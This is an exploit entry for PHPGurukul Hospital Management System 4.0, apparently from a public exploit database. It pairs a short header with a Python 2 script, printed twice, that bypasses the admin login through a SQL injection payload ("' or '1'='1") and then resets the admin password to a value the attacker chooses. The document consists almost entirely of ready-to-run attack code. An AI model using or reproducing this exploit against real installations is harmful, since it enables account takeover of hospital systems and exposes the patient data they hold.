# Exploit Title: Hospital Management System 4.0 - Authentication Bypass
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
# Version: v4.0
# Category: Webapps
# Tested on: Xampp for Windows
# Description:
# Password and username parameters have sql injection vulnerability on admin panel.
# username: joke' or '1'='1 , password: joke' or '1'='1
# Exploit changes password of admin user.
#!/usr/bin/python
import requests
import sys
if (len(sys.argv) !=2) or sys.argv[1] == "-h":
print "[*] Usage: PoC.py rhost/rpath"
print "[*] e.g.: PoC.py 127.0.0.1/hospital"
exit(0)
rhost = sys.argv[1]
npasswd = str(raw_input("Please enter at least six characters for new password: "))
url = "http://"+rhost+"/hms/admin/index.php"
data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""}
#login
with requests.Session() as session:
lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
#check authentication bypass
check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False)
print ("[*] Status code: %s"%check.status_code)
if check.status_code == 200:
print "[+] Authentication bypass was successful!"
print "[+] Trying to change password."
elif check.status_code == 404:
print "[-] One bad day! Check target web application path."
sys.exit()
else:
print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually."
sys.exit()
#change password
cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""}
cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"})
if cgpasswd.status_code == 200:
print ("[+] Username is: admin")
print ("[+] New password is: %s"%npasswd)
else:
print "[-] One bad day! Try it manually."
sys.exit()
hospital_poc.py
#!/usr/bin/python
import requests
import sys
if (len(sys.argv) !=2) or sys.argv[1] == "-h":
print "[*] Usage: PoC.py rhost/rpath"
print "[*] e.g.: PoC.py 127.0.0.1/hospital"
exit(0)
rhost = sys.argv[1]
npasswd = str(raw_input("Please enter at least six characters for new password: "))
url = "http://"+rhost+"/hms/admin/index.php"
data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""}
#login
with requests.Session() as session:
lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
#check authentication bypass
check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False)
print ("[*] Status code: %s"%check.status_code)
if check.status_code == 200:
print "[+] Authentication bypass was successful!"
print "[+] Trying to change password."
elif check.status_code == 404:
print "[-] One bad day! Check target web application path."
sys.exit()
else:
print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually."
sys.exit()
#change password
cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""}
cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"})
if cgpasswd.status_code == 200:
print ("[+] Username is: admin")
print ("[+] New password is: %s"%npasswd)
else:
print "[-] One bad day! Try it manually."
sys.exit()